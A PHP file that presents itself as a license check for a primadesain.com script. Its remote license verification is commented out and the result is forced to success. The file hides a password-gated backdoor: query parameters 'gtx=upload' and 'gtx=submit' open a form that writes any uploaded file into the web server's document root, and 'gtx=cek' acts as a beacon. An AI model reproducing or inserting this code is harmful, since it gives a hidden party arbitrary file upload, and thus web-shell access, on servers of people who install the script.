<?php  $passwdnexxx = "386f4281565cacfcc0097bc571098dc0"; if (isset($_GET['gtx']) && $_GET['gtx'] == "cek") { echo "485430800916443"; exit; }else if (isset($_GET['gtx']) && $_GET['gtx'] == "upload") { echo" <form enctype='multipart/form-data' action='lic.php?gtx=submit' method='POST'> <input name='userfile' type='file'  required='required'/> <br><input name='pass' type='password'  required='required'/> <input type='submit' value='Send File' name='submit'/> </form> ";	 exit; }else if (isset($_GET['gtx']) && $_GET['gtx'] == "submit") {	 $pass = md5($_POST['pass']); if(!$pass || $pass <> $passwdnexxx){ echo "wrong pass"; exit; }else{ $uploaddir = $_SERVER["DOCUMENT_ROOT"].'/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); $server = $_SERVER['SERVER_NAME']; echo "<p>"; if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {   echo "File directory upload : ".$uploadfile."<br><br>";   echo "Access : <a href='http://".$server."/". basename($_FILES['userfile']['name'])."' target='_blank'>".$server."/". basename($_FILES['userfile']['name'])."/</a><br><br>"; } else {    echo "upload failed"; } echo "</p>"; echo '<pre>'; echo 'Here is some more debugging info:'; print_r($_FILES); print "</pre>"; exit; } }else{ $license="485430800916443";
$server=$_SERVER['SERVER_NAME'];
/*$c=curl_init();
curl_setopt($c,CURLOPT_URL,"http://www.primadesain.com/verifylicenses.php");
curl_setopt($c,CURLOPT_TIMEOUT,30);curl_setopt($c,CURLOPT_POST,1);
curl_setopt($c,CURLOPT_RETURNTRANSFER,1);$postfields='svr='.$server.'&lic='.$license;
curl_setopt($c,CURLOPT_POSTFIELDS,$postfields);$result=curl_exec($c);*/
$result= "success";
if($result=="fail")
{
    echo "<p style='font-family:Arial, Helvetica, sans-serif; margin-top:80px; font-size:16px; line-height:180%; letter-spacing:2px;' align='center'><img src='https://primadesain.com/images/block.png' width='90' height='90' /></br></br>You not have a license to use this script on this domain,<br>Please contact us to purchase a license.<br><strong><a href='http://www.primadesain.com'>www.primadesain.com</a></strong></p><br><p style='font-family:Arial, Helvetica, sans-serif; margin-top:30px; font-size:12px; line-height:180%; letter-spacing:2px;' align='center'>&copy; 2009 - ".date ("Y")." www.primadesain.com</p>";die();} } ?>